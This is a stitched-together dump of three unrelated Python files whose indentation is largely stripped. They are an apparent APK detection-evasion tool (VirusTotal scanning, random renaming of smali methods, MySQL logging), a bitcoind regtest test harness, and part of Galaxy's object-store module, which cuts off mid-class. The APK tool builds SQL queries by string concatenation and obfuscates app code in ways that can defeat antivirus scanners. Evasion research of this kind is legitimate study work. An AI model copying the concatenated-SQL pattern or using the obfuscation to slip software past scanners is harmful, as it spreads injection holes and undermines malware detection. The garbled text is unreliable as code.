'isMalware': "",
str(self.apkName): []
}
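    # Upload the APK to VirusTotal and poll the report endpoint until the scan
    # finishes, rotating through self.apiPool when an API key hits its rate
    # limit (HTTP 204). apiPool is empty here, so keys have to be added before
    # this can return a report.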
def isApkMalware(self):
def scanApk(publicApiKey):
print("Scanning File: " + str(self.apkDir + self.apkName))
print("Scan url: " + self.scanUrl)
params = {'apikey': publicApiKey}
files = {'file': (str(self.apkName), open(str(self.apkDir + self.apkName), 'rb'))}
response = requests.post(str(self.scanUrl), files=files, params=params)
if str(response.status_code) != '204':
rsc = response.json()['resource']
return rsc
else:
return '204'
def reportApk(publicApiKey, scanResource):
# time.sleep(10)
msg = "Your resource is queued for analysis"
while msg != 'Scan finished, information embedded':
print("verbose_msg: " + msg)
time.sleep(10)
params = {'apikey': publicApiKey, 'resource': scanResource}
response = requests.get(self.reportUrl, params=params)
if response.status_code == 204:
return False
msg = response.json()['verbose_msg']
return [response.json()['positives'], response.json()['total']]
for api in self.apiPool:
print("APK Scanning...")
resources = scanApk(self.apiPool[api])
if resources == '204':
print("API limit expired, changing API...")
continue
print("APK Scanned, resources received!\nRecources: " + resources)
print("APK Reporting...")
results = reportApk(self.apiPool[api], resources)
if not results:
print("API limit expired, changing API...")
continue
print("APK Reported, results received!")
self.report['isMalware'] = 'True'
self.report[self.apkName] = results
return self.report
class Database():
def __init__(self, apkName):
self.apkName = apkName
self.user = "root"
self.database = "catchmeifyoucan"
def connect(self):
return mysql.connector.connect(user=self.user, database=self.database)
def insertApk(self, methodId, positives, total, firstResult):
cnx = self.connect()
cursor = cnx.cursor(buffered=True)
addApk = """INSERT INTO apktable (APKname) VALUES ('""" + self.apkName + """')"""
cursor.execute(addApk)
print("Apk added to database")
maxid = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.close()
self.insertMethodResult(maxid, methodId, positives, total, firstResult)
def insertMethodResult(self, apkId, methodId, positive, total, firstSearch):
cnx = self.connect()
cursor = cnx.cursor(buffered=True)
addApk = """INSERT INTO results (APKid, mid, firstSearch, positive, total) VALUES (""" + str(apkId) + """, """ + str(methodId) + """, """ + str(firstSearch) + """, """ + str(positive) + """, """ + str(total) + """)"""
print(addApk)
cursor.execute(addApk)
print("Results saved to database")
cnx.commit()
cursor.close()
cnx.close()
def getResultsOfLastApk(self):
cnx = self.connect()
cursor = cnx.cursor(buffered=True)
addApk = """SELECT * FROM results WHERE APKid = (select max(APKid) from apktable)"""
cursor.execute(addApk)
for a in cursor:
print(a)
cnx.commit()
cursor.close()
cnx.close()
#return SELECT * FROM `results` WHERE APKid = (select max(APKid) from apktable)
def getResultsOfAllApks(self):
print()
class Analyzer():
def __init__(self, name, result):
self.fileName = name
self.results = [["NONE", result]]
self.id = -1
    def addToResults(self, transform, res):
        self.results.append([transform, res])
def showResults(self):
print(self.results)
def addToDataBase(self):
def doAdd():
print("added")
return 1
        self.id = doAdd()
class Transformer():
def __init__(self, name, dir):
self.apkName = name
self.apkDir = dir
# os.system("mkdir " + dir + "Transformed versions")
self.morphs = ['Repacking','Method-Name-Transformer']
# for morph in morphs:
# os.system("mkdir " + dir + "Transformed versions/" + morph)
# METHOD TRANSFORMER VARIABLES
self.methodNames = {}
self.unwantedMethodType = [
' public ',
' static ',
' constructor ',
' protected '
]
self.allMethods = []
self.allModifiableMethods = []
self.method = []
def randomStrings(self, stringLength=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def getListOfFiles(self):
dirName = self.apkDir + self.apkName + "/smali/"
print("*************************************\nDIRNAME\n***********************************")
print(dirName)
listOfFiles = list()
for (dirpath, dirnames, filenames) in os.walk(dirName):
print("ddddsfadlşkfk")
listOfFiles += [os.path.join(dirpath, file) for file in filenames]
return listOfFiles
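    # Three passes over the decompiled smali: collect method names, generate
    # unique random replacements for the modifiable ones, then rewrite every
    # smali file with the renamed methods.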
def methodTransformer(self):
def findMethods():
controller = False
for smaliFile in smaliFileList:
with open(smaliFile) as fp:
for cnt, line in enumerate(fp):
controller = False
if '.method ' in line:
splittedLine = str(line.split(" ")[-1]).split("(")[0]
if splittedLine not in self.allMethods and len(splittedLine) > 1:
self.allMethods.append(splittedLine)
for word in self.unwantedMethodType:
if word in line:
controller = True
if not controller:
self.allModifiableMethods.append([splittedLine, smaliFile, cnt])
def createRandomNames():
for methods in self.allModifiableMethods:
nN = self.randomStrings(random.randint(10, 15))
if nN not in self.allMethods:
self.methodNames[methods[0]] = nN
else:
createRandomNames()
break
def changeMethods():
for method, newName in self.methodNames.items():
for file in smaliFileList:
#print("Method: " + method + " " + file)
def doChange():
fin = open(file, "rt")
fout = open(file[:-6] + "-1.smali", "wt")
for line in fin:
fout.write(line.replace(method, newName))
fin.close()
fout.close()
p = threading.Thread(target=doChange)
p.start()
p.join()
os.remove(file)
os.rename(str(file[:-6] + "-1.smali"), file)
smaliFileList = self.getListOfFiles()
findMethods()
createRandomNames()
changeMethods()
|
bitcoind.py
|
import decimal
import json
import logging
import os
import threading
from cheroot.wsgi import PathInfoDispatcher, Server
from decimal import Decimal
from ephemeral_port_reserve import reserve
from flask import Flask, request, Response
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
from test_framework.utils import TailableProc, wait_for, TIMEOUT, BITCOIND_PATH, COIN
class BitcoindRpcInterface:
def __init__(self, data_dir, network, rpc_port):
self.cookie_path = os.path.join(data_dir, network, ".cookie")
self.rpc_port = rpc_port
self.wallet_name = "revaultd-tests"
def __getattr__(self, name):
assert not (name.startswith("__") and name.endswith("__")), "Python internals"
with open(self.cookie_path) as fd:
authpair = fd.read()
service_url = (
f"http://{authpair}@localhost:{self.rpc_port}/wallet/{self.wallet_name}"
)
proxy = AuthServiceProxy(service_url, name)
def f(*args):
return proxy.__call__(*args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir, rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.p2pport = reserve()
self.prefix = "bitcoind"
regtestdir = os.path.join(bitcoin_dir, "regtest")
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
BITCOIND_PATH,
"-datadir={}".format(bitcoin_dir),
"-printtoconsole",
"-server",
]
bitcoind_conf = {
"port": self.p2pport,
"rpcport": rpcport,
"debug": 1,
"fallbackfee": Decimal(1000) / COIN,
"rpcthreads": 32,
}
self.conf_file = os.path.join(bitcoin_dir, "bitcoin.conf")
with open(self.conf_file, "w") as f:
f.write("chain=regtest\n")
f.write("[regtest]\n")
for k, v in bitcoind_conf.items():
f.write(f"{k}={v}\n")
self.rpc = BitcoindRpcInterface(bitcoin_dir, "regtest", rpcport)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
        for p in getattr(self, "proxies", []):  # proxies are optional
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
# wait_for_mempool can be used to wait for the mempool before generating
# blocks:
    # True := wait for at least 1 transaction
    # int > 0 := wait for at least N transactions
    # 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
    #                         are in the mempool
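    # e.g. (illustrative): generate_block(1, wait_for_mempool=txid) or
    #      generate_block(6, wait_for_mempool=[txid_a, txid_b])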
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(
lambda: all(
txid in self.rpc.getrawmempool() for txid in wait_for_mempool
)
)
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
old_blockcount = self.rpc.getblockcount()
addr = self.rpc.getnewaddress()
self.rpc.generatetoaddress(numblocks, addr)
wait_for(lambda: self.rpc.getblockcount() == old_blockcount + numblocks)
def get_coins(self, amount_btc):
# subsidy halving is every 150 blocks on regtest, it's a rough estimate
# to avoid looping in most cases
numblocks = amount_btc // 25 + 1
while self.rpc.getbalance() < amount_btc:
self.generate_block(numblocks)
def generate_blocks_censor(self, n, txids):
"""Generate {n} blocks ignoring {txids}"""
fee_delta = 1000000
for txid in txids:
self.rpc.prioritisetransaction(txid, None, -fee_delta)
self.generate_block(n)
for txid in txids:
self.rpc.prioritisetransaction(txid, None, fee_delta)
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height={height} and:
- If shift >=0:
- re-mine all mempool transactions into {height} + shift
(with shift floored at 1)
- Else:
- don't re-mine the mempool transactions
Note that tx's that become invalid at {height} (because coin maturity,
locktime etc.) are removed from mempool. The length of the new chain
will be original + 1 OR original + {shift}, whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1,
use {height}=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can
be pulled forward to h1.
2. Set {height}=h2 and {shift}= h1-h2
"""
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
if height + shift > orig_len:
final_len = height + shift
else:
final_len = 1 + orig_len
self.rpc.invalidateblock(old_hash)
self.wait_for_log(
r"InvalidChainFound: invalid block=.* height={}".format(height)
)
memp = self.rpc.getrawmempool()
if shift < 0:
self.generate_blocks_censor(1 + final_len - height, memp)
elif shift == 0:
self.generate_block(1 + final_len - height, memp)
else:
self.generate_blocks_censor(shift, memp)
self.generate_block(1 + final_len - (height + shift), memp)
self.wait_for_log(r"UpdateTip: new best=.* height={}".format(final_len))
def startup(self):
try:
self.start()
except Exception:
self.stop()
raise
info = self.rpc.getnetworkinfo()
if info["version"] < 220000:
self.rpc.stop()
raise ValueError(
"bitcoind is too old. Minimum supported version is 0.22.0."
" Current is {}".format(info["version"])
)
def cleanup(self):
try:
self.stop()
except Exception:
self.proc.kill()
self.proc.wait()
class DecimalEncoder(json.JSONEncoder):
"""By default json.dumps does not handle Decimals correctly, so we override its handling"""
def default(self, o):
if isinstance(o, decimal.Decimal):
return float(o)
return super(DecimalEncoder, self).default(o)
class BitcoindRpcProxy(object):
"""A proxy to the bitcoind RPC interface that can replace commands with arbitrary results.
Starts a HTTP server in a thread, listens for incoming JSONRPC requests, and responds with
either a mocked result or the result it got from bitcoind.
This was taken and adapted from the C-lightning test suite.
"""
def __init__(self, bitcoind_rpc_port, bitcoind_cookie_path, mocks):
self.app = Flask("BitcoindProxy")
self.app.add_url_rule(
"/",
"Entrypoint",
self.proxy,
methods=["POST"],
defaults={"path": ""},
)
self.app.add_url_rule(
"/<path:path>",
"Entrypoint",
self.proxy,
methods=["POST"],
)
self.rpcport = reserve()
# A mapping from method name to result as a dict.
# Eventually, the results could be callable.
self.mocks = mocks
self.bitcoind_rpc_port = bitcoind_rpc_port
self.bitcoind_cookie_path = bitcoind_cookie_path
self.start()
def __del__(self):
self.stop()
def _handle_request(self, r, path):
"""Handle a JSONRPC request {r} made to the HTTP endpoint {path} (to handle
wallet paths)"""
method = r["method"]
# If we have set a mock for this method reply with that
if method in self.mocks:
return {"id": r["id"], "error": None, "result": self.mocks[method]}
# Otherwise, just forward the request
with open(self.bitcoind_cookie_path) as fd:
authpair = fd.read()
service_url = f"http://{authpair}@localhost:{self.bitcoind_rpc_port}/{path}"
try:
res = AuthServiceProxy(service_url, r["method"])(*r["params"])
return {"result": res, "id": r["id"]}
except JSONRPCException as e:
return {"error": e.error, "id": r["id"]}
def proxy(self, path):
r = json.loads(request.data.decode("ASCII"))
if isinstance(r, list):
reply = [self._handle_request(subreq, path) for subreq in r]
else:
reply = self._handle_request(r, path)
# \r\n because rust-jsonrpc expects it..
response = Response(json.dumps(reply, cls=DecimalEncoder) + "\r\n")
response.headers["Content-Type"] = "application/json"
return response
def start(self):
self.server = Server(
("127.0.0.1", self.rpcport),
self.app,
numthreads=32,
request_queue_size=10,
accepted_queue_timeout=20,
timeout=TIMEOUT * 2,
)
self.proxy_thread = threading.Thread(target=self.server.start)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that bitcoind is running on the real rpcport, let's tell all
# future callers to talk to the proxyport. We use the bind_addr as a
# signal that the port is bound and accepting connections.
while self.server.bind_addr[1] == 0:
pass
self.rpcport = self.server.bind_addr[1]
def stop(self):
self.server.stop()
self.proxy_thread.join()
|
__init__.py
|
"""
objectstore package, abstraction for storing blobs of data for use in Galaxy.
all providers ensure that data can be accessed on the filesystem for running
tools
"""
import abc
import logging
import os
import random
import shutil
import threading
import time
from typing import (
Any,
Dict,
List,
Type,
)
import yaml
from galaxy.exceptions import (
ObjectInvalid,
ObjectNotFound,
)
from galaxy.util import (
asbool,
directory_hash_id,
force_symlink,
parse_xml,
umask_fix_perms,
)
from galaxy.util.bunch import Bunch
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = (
"Attempted to 'create' object store entity in configuration with no database session present."
)
log = logging.getLogger(__name__)
class ObjectStore(metaclass=abc.ABCMeta):
"""ObjectStore interface.
FIELD DESCRIPTIONS (these apply to all the methods in this class):
:type obj: StorableObject
:param obj: A Galaxy object with an assigned database ID accessible via
the .id attribute.
:type base_dir: string
:param base_dir: A key in `self.extra_dirs` corresponding to the base
directory in which this object should be created, or `None` to specify
the default directory.
:type dir_only: boolean
:param dir_only: If `True`, check only the path where the file identified
by `obj` should be located, not the dataset itself. This option applies
to `extra_dir` argument as well.
:type extra_dir: string
:param extra_dir: Append `extra_dir` to the directory structure where the
dataset identified by `obj` should be located. (e.g.,
000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
config.jobs_directory =
'$GALAXY_ROOT/database/jobs_directory');
'temp' (defaulting to config.new_file_path =
'$GALAXY_ROOT/database/tmp').
:type extra_dir_at_root: boolean
:param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
the `extra_dir` argument is placed at root of the created directory
structure rather than at the end (e.g., extra_dir/000/obj.id vs.
000/extra_dir/obj.id)
:type alt_name: string
:param alt_name: Use this name as the alternative name for the created
dataset rather than the default.
:type obj_dir: boolean
:param obj_dir: Append a subdirectory named with the object's ID (e.g.
000/obj.id)
"""
@abc.abstractmethod
def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
"""Return True if the object identified by `obj` exists, False otherwise."""
raise NotImplementedError()
@abc.abstractmethod
def create(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Mark the object (`obj`) as existing in the store, but with no content.
This method will create a proper directory structure for
the file if the directory does not already exist.
"""
raise NotImplementedError()
@abc.abstractmethod
def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Test if the object identified by `obj` has content.
If the object does not exist raises `ObjectNotFound`.
"""
raise NotImplementedError()
@abc.abstractmethod
def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return size of the object identified by `obj`.
If the object does not exist, return 0.
"""
raise NotImplementedError()
@abc.abstractmethod
def delete(
self,
obj,
entire_dir=False,
base_dir=None,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
):
"""
Delete the object identified by `obj`.
:type entire_dir: boolean
:param entire_dir: If True, delete the entire directory pointed to by
extra_dir. For safety reasons, this option applies
only for and in conjunction with the extra_dir or
obj_dir options.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_data(
self,
obj,
start=0,
count=-1,
base_dir=None,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
):
"""
Fetch `count` bytes of data offset by `start` bytes using `obj.id`.
If the object does not exist raises `ObjectNotFound`.
:type start: int
:param start: Set the position to start reading the dataset file
:type count: int
:param count: Read at most `count` bytes from the dataset
"""
raise NotImplementedError()
@abc.abstractmethod
def get_filename(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Get the expected filename with absolute path for object with id `obj.id`.
This can be used to access the contents of the object.
"""
raise NotImplementedError()
@abc.abstractmethod
def update_from_file(
self,
obj,
base_dir=None,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
file_name=None,
create=False,
):
"""
Inform the store that the file associated with `obj.id` has been updated.
If `file_name` is provided, update from that file instead of the
default.
If the object does not exist raises `ObjectNotFound`.
:type file_name: string
:param file_name: Use file pointed to by `file_name` as the source for
updating the dataset identified by `obj`
:type create: boolean
:param create: If True and the default dataset does not exist, create
it first.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the URL for direct access if supported, otherwise return None.
Note: need to be careful to not bypass dataset security with this.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_concrete_store_name(self, obj):
"""Return a display name or title of the objectstore corresponding to obj.
To accommodate nested objectstores, obj is passed in so this metadata can
be returned for the ConcreteObjectStore corresponding to the object.
If the dataset is in a new or discarded state and an object_store_id has not
yet been set, this may return ``None``.
"""
@abc.abstractmethod
def get_concrete_store_description_markdown(self, obj):
"""Return a longer description of how data 'obj' is stored.
To accommodate nested objectstores, obj is passed in so this metadata can
be returned for the ConcreteObjectStore corresponding to the object.
If the dataset is in a new or discarded state and an object_store_id has not
yet been set, this may return ``None``.
"""
@abc.abstractmethod
def get_store_usage_percent(self):
"""Return the percentage indicating how full the store is."""
raise NotImplementedError()
@abc.abstractmethod
def get_store_by(self, obj):
"""Return how object is stored (by 'uuid', 'id', or None if not yet saved).
Certain Galaxy remote data features aren't available if objects are stored by 'id'.
"""
raise NotImplementedError()
class BaseObjectStore(ObjectStore):
store_by: str
store_type: str
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
self.running = True
self.config = config
self.check_old_style = config.object_store_check_old_style
extra_dirs = {}
extra_dirs["job_work"] = config.jobs_directory
extra_dirs["temp"] = config.new_file_path
extra_dirs.update({e["type"]: e["path"] for e in config_dict.get("extra_dirs", [])})
self.extra_dirs = extra_dirs
def shutdown(self):
"""Close any connections for this ObjectStore."""
self.running = False
def file_ready(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Check if a file corresponding to a dataset is ready to be used.
Return True if so, False otherwise
"""
return True
@classmethod
def parse_xml(clazz, config_xml):
"""Parse an XML description of a configuration for this object store.
Return a configuration dictionary (such as would correspond to the YAML configuration)
for the object store.
"""
raise NotImplementedError()
@classmethod
def from_xml(clazz, config, config_xml, **kwd):
config_dict = clazz.parse_xml(config_xml)
return clazz(config, config_dict, **kwd)
def to_dict(self):
extra_dirs = []
for extra_dir_type, extra_dir_path in self.extra_dirs.items():
extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
return {
"config": config_to_dict(self.config),
"extra_dirs": extra_dirs,
"type": self.store_type,
}
def _get_object_id(self, obj):
if hasattr(obj, self.store_by):
obj_id = getattr(obj, self.store_by)
if obj_id is None:
obj.flush()
return obj.id
return obj_id
else:
            # jobs don't have uuids, so always use ID in this case when creating
# job working directories.
return obj.id
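    # The public API below simply delegates to the subclass-provided
    # implementations prefixed with an underscore (e.g. exists() -> _exists()).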
def _invoke(self, delegate, obj=None, **kwargs):
return self.__getattribute__(f"_{delegate}")(obj=obj, **kwargs)
def exists(self, obj, **kwargs):
return self._invoke("exists", obj, **kwargs)
def create(self, obj, **kwargs):
return self._invoke("create", obj, **kwargs)
def empty(self, obj, **kwargs):
return self._invoke("empty", obj, **kwargs)
def size(self, obj, **kwargs):
return self._invoke("size", obj, **kwargs)
def delete(self, obj, **kwargs):
return self._invoke("delete", obj, **kwargs)
def get_data(self, obj, **kwargs):
return self._invoke("get_data", obj, **kwargs)
def get_filename(self, obj, **kwargs):
return self._invoke("get_filename", obj, **kwargs)
def update_from_file(self, obj, **kwargs):
return self._invoke("update_from_file", obj, **kwargs)
def get_object_url(self, obj, **kwargs):
return self._invoke("get_object_url", obj, **kwargs)
def get_concrete_store_name(self, obj):
return self._invoke("get_concrete_store_name", obj)
def get_concrete_store_description_markdown(self, obj):
return self._invoke("get_concrete_store_description_markdown", obj)
def get_store_usage_percent(self):
return self._invoke("get_store_usage_percent")
def get_store_by(self, obj, **kwargs):
return self._invoke("get_store_by", obj, **kwargs)
class ConcreteObjectStore(BaseObjectStore):
"""Subclass of ObjectStore for stores that don't delegate (non-nested).
    Currently only adds store_by functionality, which doesn't make
    sense for the delegating object stores.
"""
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
super().__init__(config=config, config_dict=config_dict, **kwargs)
self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
self.name = config_dict.get("name", None)
self.description = config_dict.get("description", None)
def to_dict(self):
rval = super().to_dict()
rval["store_by"] = self.store_by
rval["name"] = self.name
rval["description"] = self.description
return rval
def _get_concrete_store_name(self, obj):
return self.name
def _get_concrete_store_description_markdown(self, obj):
return self.description
def _get_store_by(self, obj):
return self.store_by
class DiskObjectStore(ConcreteObjectStore):
"""
Standard Galaxy object store.
Stores objects in files under a specific directory on disk.
>>> from galaxy.util.bunch import Bunch
>>> import tempfile
>>> file_path=tempfile.mkdtemp()
>>> obj = Bunch(id=1)
>>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
>>> s.create(obj)
>>> s.exists(obj)
True
>>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
"""
store_type = "disk"
def __init__(self, config, config_dict):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`ObjectStore` plus:
* file_path -- Default directory to store objects to disk in.
* umask -- the permission bits for newly created files.
:type file_path: str
:param file_path: Override for the `config.file_path` value.
:type extra_dirs: dict
:param extra_dirs: Keys are string, values are directory paths.
"""
super().__init__(config, config_dict)
self.file_path = os.path.abspath(config_dict.get("files_dir") or config.file_path)
@classmethod
def parse_xml(clazz, config_xml):
extra_dirs = []
config_dict = {}
if config_xml is not None:
store_by = config_xml.attrib.get("store_by", None)
if store_by is not None:
config_dict["store_by"] = store_by
name = config_xml.attrib.get("name", None)
if name is not None:
config_dict["name"] = name
for e in config_xml:
if e.tag == "files_dir":
config_dict["files_dir"] = e.get("path")
elif e.tag == "description":
config_dict["description"] = e.text
else:
extra_dirs.append({"type": e.get("type"), "path": e.get("path")})
config_dict["extra_dirs"] = extra_dirs
return config_dict
def to_dict(self):
as_dict = super().to_dict()
as_dict["files_dir"] = self.file_path
return as_dict
def __get_filename(
self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False
):
"""
Return the absolute path for the file corresponding to the `obj.id`.
This is regardless of whether or not the file exists.
"""
path = self._construct_path(
obj,
base_dir=base_dir,
dir_only=dir_only,
extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root,
alt_name=alt_name,
obj_dir=False,
old_style=True,
)
# For backward compatibility: check the old style root path first;
# otherwise construct hashed path.
if not os.path.exists(path):
            return self._construct_path(
                obj,
                base_dir=base_dir,
                dir_only=dir_only,
                extra_dir=extra_dir,
                extra_dir_at_root=extra_dir_at_root,
                alt_name=alt_name,
            )
        return path
# TODO: rename to _disk_path or something like that to avoid conflicts with
# children that'll use the local_extra_dirs decorator, e.g. S3
def _construct_path(
self,
obj,
old_style=False,
base_dir=None,
dir_only=False,
extra_dir=None,
extra_dir_at_root=False,
alt_name=None,
obj_dir=False,
**kwargs,
):
"""
Construct the absolute path for accessing the object identified by `obj.id`.
:type base_dir: string
:param base_dir: A key in self.extra_dirs corresponding to the base
directory in which this object should be created, or
None to specify the default directory.
:type dir_only: boolean
:param dir_only: If True, check only the path where the file
identified by `obj` should be located, not the
dataset itself. This option applies to `extra_dir`
argument as well.
:type extra_dir: string
:param extra_dir: Append the value of this parameter to the expected
path used to access the object identified by `obj` (e.g.,
/files/000/<extra_dir>/dataset_10.dat).
:type alt_name: string
:param alt_name: Use this name as the alternative name for the returned
dataset rather than the default.
:type old_style: boolean
param old_style: This option is used for backward compatibility. If
`True` then the composed directory structure does not include a
hash id (e.g., /files/dataset_10.dat (old) vs.
/files/000/dataset_10.dat (new))
"""
base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
# extra_dir should never be constructed from provided data but just
        # make sure there are no shenanigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning("extra_dir is not normalized: %s", extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name and not safe_relpath(alt_name):
log.warning("alt_name would locate path outside dir: %s", alt_name)
raise ObjectInvalid("The requested object is invalid")
obj_id = self._get_object_id(obj)
if old_style:
if extra_dir is not None:
path = os.path.join(base, extra_dir)
else:
path = base
else:
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj_id))
# Create a subdirectory for the object ID
if obj_dir:
rel_path = os.path.join(rel_path, str(obj_id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
path = os.path.join(base, rel_path)
if not dir_only:
assert (
obj_id is not None
), f"The effective dataset identifier consumed by object store [{self.store_by}] must be set before a path can be constructed."
path = os.path.join(path, alt_name if alt_name else f"dataset_{obj_id}.dat")
return os.path.abspath(path)
def _exists(self, obj, **kwargs):
"""Override `ObjectStore`'s stub and check on disk."""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility: check root path first; otherwise
# construct and check hashed path.
if os.path.exists(path):
return True
return os.path.exists(self._construct_path(obj, **kwargs))
def _create(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by creating any files and folders on disk."""
if not self._exists(obj, **kwargs):
path = self._construct_path(obj, **kwargs)
dir_only = kwargs.get("dir_only", False)
# Create directory if it does not exist
dir = path if dir_only else os.path.dirname(path)
safe_makedirs(dir)
# Create the file if it does not exist
if not dir_only:
open(path, "w").close() # Should be rb?
umask_fix_perms(path, self.config.umask, 0o666)
def _empty(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by checking file size on disk."""
return self.size(obj, **kwargs) == 0
def _size(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by return file size on disk.
Returns 0 if the object doesn't exist yet or other error.
"""
if self._exists(obj, **kwargs):
try:
filepath = self._get_filename(obj, **kwargs)
for _ in range(0, 2):
size = os.path.getsize(filepath)
if size != 0:
break
# May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
time.sleep(0.01)
return size
except OSError:
return 0
else:
return 0
def _delete(self, obj, entire_dir=False, **kwargs):
"""Override `ObjectStore`'s stub; delete the file or folder on disk."""
path = self._get_filename(obj, **kwargs)
extra_dir = kwargs.get("extra_dir", None)
obj_dir = kwargs.get("obj_dir", False)
try:
if entire_dir and (extra_dir or obj_dir):
shutil.rmtree(path)
return True
if self._exists(obj, **kwargs):
os.remove(path)
return True
except OSError as ex:
log.critical(f"{self.__get_filename(obj, **kwargs)} delete error {ex}")
return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
"""Override `ObjectStore`'s stub; retrieve data directly from disk."""
data_file = open(self._get_filename(obj, **kwargs)) # Should be rb?
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def _get_filename(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
If `object_store_check_old_style` is set to `True` in config then the
root path is checked first.
"""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility, check root path first; otherwise,
# construct and return hashed path
if os.path.exists(path):
return path
path = self._construct_path(obj, **kwargs)
if not os.path.exists(path):
raise ObjectNotFound
return path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
"""`create` parameter is not used in this implementation."""
preserve_symlinks = kwargs.pop("preserve_symlinks", False)
# FIXME: symlinks and the object store model may not play well together
# these should be handled better, e.g. registering the symlink'd file
# as an object
if create:
self._create(obj, **kwargs)
if file_name and self._exists(obj, **kwargs):
try:
if preserve_symlinks and os.path.islink(file_name):
force_symlink(os.readlink(file_name), self._get_filename(obj, **kwargs))
else:
path = self._get_filename(obj, **kwargs)
shutil.copy(file_name, path)
umask_fix_perms(path, self.config.umask, 0o666)
except shutil.SameFileError:
# That's ok, we need to ignore this so that remote object stores can update
# the remote object from the cache file path
pass
except OSError as ex:
log.critical(f"Error copying {file_name} to {self.__get_filename(obj, **kwargs)}: {ex}")
raise ex
def _get_object_url(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
Returns `None`, we have no URLs.
"""
return None
def _get_store_usage_percent(self, **kwargs):
"""Override `ObjectStore`'s stub by return percent storage used."""
st = os.statvfs(self.file_path)
return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
class NestedObjectStore(BaseObjectStore):
"""
Base for ObjectStores that use other ObjectStores.
